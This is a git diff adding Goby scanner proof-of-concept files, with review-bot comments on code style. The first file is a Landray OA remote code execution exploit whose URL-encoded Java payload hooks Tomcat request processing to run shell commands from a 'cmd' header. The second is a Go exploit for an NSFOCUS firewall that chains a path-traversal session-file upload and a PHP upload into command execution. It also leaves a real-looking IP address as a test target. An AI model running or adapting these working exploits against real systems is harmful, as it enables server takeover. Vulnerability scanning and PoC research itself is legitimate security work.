"s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+||+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+new+String[
]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "This page has a bug", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "POST", + "uri": "/data/sys-common/treexml.tmpl", + "follow_redirect": true, + "header": { + "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", + "Accept-Encoding": "gzip, deflate", + "cmd": "{{{command}}}", + "Accept": "*/*", + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": 
"s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+||+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+new+String[
]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody||" + ] + } + ], + "Tags": [ + "代码执⾏" + ], + "VulType": [ + "代码执⾏" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "", + "Translation": { + "CN": { + "Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞", + "Product": "蓝凌OA", + "Description": "

蓝凌OA treexml.tmpl存在远程代码执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限

", + "Recommendation": "", + "Impact": "", + "VulType": [ + "代码执⾏" + ], + "Tags": [ + "代码执⾏" + ] + }, + "EN": { + "Name": "landray-oa-treexml-rce", + "Product": "", + "Description": "", + "Recommendation": "", + "Impact": "", + "VulType": [], + "Tags": [] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + nil, + nil, + )) +} \ No newline at end of file diff --git a/lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt b/lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt new file mode 100644 index 000000000..727a29303 --- /dev/null +++ b/lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt @@ -0,0 +1,242 @@ +package exploits + +import ( + "fmt" + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "net/url" + "strings" + "time" +) + +func init() { + expJson := `{ + "Name": "nsfocus resourse.php arbitrary file upload vulnerability", + "Description": "
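Review bot: The metadata block is inconsistent with the sibling PoCs in this commit: `"CVEIDs": [""]`, `"CNNVD": [""]` and `"CNVD": [""]` carry an empty string as an identifier where the other files use `null`, `"Author"` is empty, and the `EN` translation holds only a slug name with empty `Description` and `Recommendation`. The URL-encoded Java script in `data` is repeated byte-for-byte in ScanSteps and ExploitSteps with nothing explaining it; a one-line comment above `expJson` such as `// the script reads the "cmd" request header, runs it via ProcessBuilder and writes the output into the response` would make the duplicated blob reviewable, and keeping it in one place would avoid the two copies drifting. The `Accept-Encoding: gzip, deflate` request header means the `$body contains` checks depend on the HTTP client transparently decompressing the response — presumably it does, but worth confirming.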

NSFOCUS Next Generation Firewall is a dedicated security firewall device.

There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.

", + "Product": "nsfocus", + "Homepage": "https://www.nsfocus.com.cn/", + "DisclosureDate": "2022-07-18", + "Author": "LittleBlack", + "FofaQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"", + "GobyQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"", + "Level": "3", + "Impact": "

There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.

", + "Recommendation": "

1. Block 8081 port access. 2. Pay attention to the update of the official website in time: https://www.nsfocus.com.cn/

", + "References": [ + "https://fofa.so/" + ], + "Is0day": false, + "HasExp": true, + "ExpParams": [ + { + "name": "cmd", + "type": "input", + "value": "system('id');", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "VulType": [ + "Code Execution" + ], + "Tags": [ + "Code Execution" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "9.5", + "Translation": { + "CN": { + "Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞", + "Product": "绿盟下一代防火墙", + "Description": "

绿盟下一代防火墙是一款专用安全防火墙设备。

绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。

", + "Recommendation": "

1、阻拦8081端口访问。2、及时关注官网更新:https://www.nsfocus.com.cn/

", + "Impact": "

绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。

", + "VulType": [ + "代码执⾏" + ], + "Tags": [ + "代码执⾏" + ] + }, + "EN": { + "Name": "nsfocus resourse.php 任意文件上传漏洞", + "Product": "nsfocus", + "Description": "

NSFOCUS Next Generation Firewall is a dedicated security firewall device.

There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.

", + "Recommendation": "

1. Block 8081 port access. 2. Pay attention to the update of the official website in time: https://www.nsfocus.com.cn/

", + "Impact": "

There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.

", + "VulType": [ + "Code Execution" + ], + "Tags": [ + "Code Execution" + ] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + + u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081") + uri1 := "/api/v1/device/bugsInfo" + cfg1 := httpclient.NewPostRequestConfig(uri1) + cfg1.VerifyTls = false + cfg1.FollowRedirect = false + cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9") + cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n" + if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") { + time.Sleep(time.Second * 5) + uri2 := "/api/v1/device/bugsInfo" + cfg2 := httpclient.NewPostRequestConfig(uri2) + cfg2.VerifyTls = false + cfg2.FollowRedirect = false + cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef") + cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n\r\n--4803b59d015026999b45993b1245f0ef--\r\n" + if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") { + u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433") + uri3 := "/mail/include/header_main.php" + cfg3 := httpclient.NewPostRequestConfig(uri3) + cfg3.VerifyTls = false + cfg3.FollowRedirect = false + cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71") + 
cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded") + cfg3.Data = "1=print+md5%281%29%3B" + if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil { + return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b") + } + + } + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + cmd := ss.Params["cmd"].(string) + + u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081") + uri1 := "/api/v1/device/bugsInfo" + cfg1 := httpclient.NewPostRequestConfig(uri1) + cfg1.VerifyTls = false + cfg1.FollowRedirect = false + cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9") + cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n" + if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") { + time.Sleep(time.Second * 5) + uri2 := "/api/v1/device/bugsInfo" + cfg2 := httpclient.NewPostRequestConfig(uri2) + cfg2.VerifyTls = false + cfg2.FollowRedirect = false + cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef") + cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n\r\n--4803b59d015026999b45993b1245f0ef--\r\n" + if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") { + u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433") + uri3 := "/mail/include/header_main.php" + cfg3 := httpclient.NewPostRequestConfig(uri3) + cfg3.VerifyTls = false + 
cfg3.FollowRedirect = false + cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71") + cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded") + cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd)) + if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 { + expResult.Output = resp3.RawBody + expResult.Success = true + } + + } + } + return expResult + }, + )) +} + +//https://222.75.146.134:4433
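Review bot: `cmd := ss.Params["cmd"].(string)` in the exploit handler is an unchecked type assertion that panics the scanner when the parameter is missing or not a string; use the two-value form and return `expResult` unchanged when it fails. The trailing `//https://222.75.146.134:4433` comment looks like a leftover test target and should not be committed. The JSON `ScanSteps` and `ExploitSteps` still probe `/test.php` for the string `test`, which has nothing to do with what the Go callbacks do and reads as a placeholder; either remove them or add a comment stating that the Go handlers supersede them. `time.Sleep(time.Second * 5)` in both handlers blocks a scan worker with no cancellation, so a comment explaining why the delay is required (and whether a shorter poll would do) is warranted.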